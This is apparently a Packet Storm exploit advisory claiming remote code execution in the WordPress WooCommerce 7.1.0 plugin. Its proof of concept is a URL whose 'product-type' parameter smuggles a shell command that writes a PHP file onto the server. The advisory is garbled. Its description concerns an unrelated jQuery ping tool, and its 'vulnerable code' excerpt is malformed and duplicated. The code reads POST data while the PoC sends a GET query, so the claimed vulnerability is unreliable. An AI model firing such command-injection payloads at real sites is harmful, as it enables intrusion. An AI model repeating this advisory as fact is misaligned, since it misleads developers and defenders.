WordPress WooCommerce plugin version 7.1.0 suffers from a remote code execution vulnerability.
f021cd47c7f1b017839fccc746799aa283e87568ba3bd7b36c7e5308828f5b5e# Title: Wordpress Plugin WooCommerce v7.1.0 - Remote Code Execution(RCE)
# Date: 2022-12-07
# Author: Milad Karimi
# Vendor Homepage: https://wordpress.org/plugins/woocommerce
# Software Link: https://wordpress.org/plugins/woocommerce
# Tested on: windows 10 , firefox
# Version: 7.1.0
# CVE : N/A
# Description:
simple, easy to use jQuery frontend to php backend that pings various
devices and changes colors from green to red depending on if device is
up or down.
# PoC :
http://localhost/woocommerce/includes/admin/meta-boxes/class-wc-meta-box-product-images.php?product-type=;echo '<?php phpinfo(); ?>' >info.php
http://localhost/woocommerce/includes/admin/meta-boxes/class-wc-meta-box-product-images.php?product-type=;echo '<?php phpinfo(); ?>' >info.php
# Vulnerabile code:
95: $classname $classname($post_id);
94: $classname = WC_Product_Factory::get_product_classname($post_id, $product_type : 'simple');
92: ⇓ function save($post_id, $post)
93: $product_type = WC_Product_Factory::get_product_type($post_id) : sanitize_title(stripslashes($_POST['product-type']));
92: ⇓ function save($post_id, $post)
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed